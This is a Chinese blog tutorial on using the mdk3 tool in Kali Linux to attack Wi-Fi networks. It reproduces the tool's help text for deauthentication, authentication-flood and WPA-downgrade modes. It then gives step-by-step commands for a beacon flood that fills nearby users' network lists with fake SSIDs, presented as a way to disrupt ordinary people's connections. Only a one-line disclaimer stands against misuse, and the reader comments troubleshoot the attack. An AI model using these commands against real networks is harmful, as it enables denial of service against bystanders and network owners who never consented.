cemdk3利用常见的IEEE 802.11协议弱点,对扫描到的AP进行测试
- 可以对对无线网络中的路由器就行泛洪攻击,踢掉所有连接的客户端,最后使其当机,达到攻击目的。
- 也可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者
上次我们介绍了如何用kali搭建钓鱼wifi,有兴趣的朋友可以去看看:
本实验环境在kali,禁止用于非法用途!
使用方法
[email protected]:~# mdk3
MDK 3.0 v6 - "Yeah, well, whatever"
由k2wrlz的ASPj编写,使用aircrack-ng中的osdep库
在伟大的aircrack-ng社区的大力帮助下:
Antragon,moongray,Ace,Zero_Chaos,Hirte,thefkboss,tapepepe,
telek0miker,Le_Vert,sorbo,Andy Green,bahathir和Dawid Gajownik
谢谢!
MDK是一种概念证明工具,可利用常见的IEEE 802.11协议弱点。
重要提示:确保您有获得
网络所有者,然后对其运行MDK。
此代码已获得GPLv2的许可
MDK用法:
mdk3 <接口> <测试模式> [测试选项]
尝试mdk3 --fullhelp获得所有测试选项
尝试mdk3 --help <test_mode>仅获得有关一项测试的信息
测试模式:
b-信标洪水模式
发送信标帧以在客户端显示伪造的AP。
有时这可能会使网络扫描仪甚至驱动程序崩溃!
a-身份验证DoS模式
将认证帧发送到范围内找到的所有AP。
太多的客户端冻结或重置了一些AP。
p-基本探测和ESSID Bruteforce模式
探测AP并检查答案,对于检查SSID是否具有有用
已被正确地伪装或AP在您的适配器发送范围内
在此测试模式下,SSID暴力破解也是可能的。
d-取消身份验证/解除关联Amok模式
踢找到AP的所有人
m-迈克尔关机(TKIP)
连续取消所有流量
x-802.1X测试
w-WIDS / WIPS混淆
混淆/滥用入侵检测和防御系统
f-MAC过滤器暴力破解模式
此测试使用已知客户端MAC地址的列表,并尝试
在动态更改的同时对给定的AP进行身份验证
其响应超时以获得最佳性能。目前仅适用
正确拒绝开放身份验证请求的AP上
g-WPA降级测试
对发送WPA加密数据包的站点和AP取消身份验证。
通过此测试,您可以检查系统管理员是否将尝试设置其
网络到WEP或禁用加密。
b-信标洪水模式
这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;
我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
- 使用方法
-f <WIFI名称列表文件的所在位置> 使用此WIFI列表发起信号溢出攻击
-v <带WIFI名称和MAC地址的对应文件所在位置> 使用此WIFI列表和MAC地址列表发起信号溢出攻击
-w 加密方式为WEP
-t 加密方式为WPA/PSK
-a 加密方式为WPA/2
-g 54M模式
-m 读取数据库中的MAC地址列表
-c <信道数> 设置这些伪造的这些WIFI信号的信道数
-s <帧数> 设置广播这些伪造WIFI数据包的速度,速度越快用户接受到的列表越多越快,但是对网卡有一定影响
实验操作
- 首先将网卡设置为监听模式
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0 //建立监听
这里的wlan0是自己的无线网卡,可以输入ifconfig查看
(最后一条命令多执行几次,直到ifconfig出现wlan0mon)
- 新建一个文本用于WIFI名称列表文件
cd /root/
touch wifi.txt
vim wifi.txt
按i
后输入内容,这是我如输入
欢迎大家
来到我的小站
https://yuaneu.ro
这里会分析一些我学习的历程
记录学习点滴
test0
test1
test2
按Esc
输入:wq
保存
3.使用此WIFI列表发起信号溢出攻击
mdk3 wlan0mon b -f /root/wifi.txt
4.查看效果
可以看到,wifi列表中大量充斥这我们创造的虚假wifi,干扰了正常人的连接
下一篇将说一说利用mdk3的其他攻击模式
随时更新
3 条评论
请教一下,为什么我手机收不到这些开放的wifi呀
这个可能和你手机的安全设置有关系吧,也可以增加参数-a或-t就会生成加密的虚假wifi
可能我的手机有问题,我做wifi钓鱼的实验 也收不到 airbase-ng创建的伪热点,但是我配置好dhcp服务和ip转发后,又突然可以连接了。